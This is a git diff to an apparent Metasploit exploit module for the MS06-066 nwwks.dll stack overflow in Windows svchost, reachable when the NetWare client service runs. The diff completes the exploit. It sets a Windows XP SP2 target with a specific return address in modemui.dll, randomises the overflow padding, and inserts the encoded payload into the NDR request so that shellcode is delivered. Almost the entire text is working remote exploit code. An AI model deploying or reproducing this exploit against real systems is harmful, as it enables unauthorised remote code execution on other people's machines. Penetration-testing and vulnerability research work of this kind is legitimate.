diff --git a/modules/exploits/windows/smb/ms06_066_nwwks.rb b/modules/exploits/windows/smb/ms06_066_nwwks.rb index ca38bb5e32..513c45bc8e 100644 --- a/modules/exploits/windows/smb/ms06_066_nwwks.rb +++ b/modules/exploits/windows/smb/ms06_066_nwwks.rb @@ -12,7 +12,8 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Services MS06-066 nwwks.dll', 'Description' => %q{ - XXX + This module exploits a stack overflow in the svchost service, when the netware + client service is running. }, 'Author' => [ 'pusscat' ], 'License' => MSF_LICENSE, @@ -42,9 +43,9 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote 'Targets' => [ [ - 'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm + 'Windows XP SP2', { - 'Ret' => 0x0BADB0D0, # umpnpmgr.dll + 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret }, ] ], @@ -64,16 +65,16 @@ class Exploits::Windows::Smb::MS06_066_NWWKS < Msf::Exploit::Remote # [in] [unique] wchar * # [out] long - ofstring = Rex::Text.to_unicode('\\\\') + "A"*292 + [ target.ret ].pack('V') + "\x00\x00" + ofstring = Rex::Text.to_unicode('\\\\') + Rex::Text.rand_text(292) + [ target.ret ].pack('V') + "\x00\x00" stubdata = NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("AAAA" + "\x00") + + NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") + NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("BBBB" + "\x00") + + NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + "\x00\x00") + NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("CCCC" + "\x00") + + NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") + NDR.long(rand(0xffffffff)) + - NDR.UnicodeConformantVaryingString("DDDD" + "\x00") + + NDR.UnicodeConformantVaryingString(Rex::Text.rand_text(rand(128)) + "\x00") + NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)